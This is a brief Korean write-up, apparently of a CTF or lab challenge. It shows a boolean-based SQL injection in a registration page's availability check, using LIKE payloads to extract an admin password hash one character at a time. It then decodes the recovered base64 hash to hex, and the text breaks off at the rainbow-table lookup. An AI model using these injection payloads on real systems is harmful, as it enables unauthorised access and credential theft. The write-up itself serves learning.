
registration 부분에 check abailability 부분으로 sql 인젝션이 가능하다. (bolean base sql injection)
like 문을 이용하여 하나씩 하면 예측 가능
admin' and password_hash LIKE 'o%' #

admin' and password_hash LIKE 'oa%' #

admin' and password_hash LIKE 'or%' #

파이썬등을 이용하면 자동화 가능
얻어진 hash값은 다음과 같음
orOGuaoRz8DCr4zK+cEHcW6l3HPV1HTjJu4Qc+AQZoP3kj04ayVpHEBR7Naz41UZ1e+R9lVvd1JQPLaY+s8JlA==
==패딩, 글자수가 4의 배수임 → base64 인코딩 방식
base64 디코딩 해보면
a2b386b9aa11cfc0c2af8ccaf9c107716ea5dc73d5d474e326ee1073e0106683f7923d386b25691c4051ecd6b3e35519d5ef91f6556f7752503cb698facf0994
을 얻는다.
레인보우 테이블에 넣어보면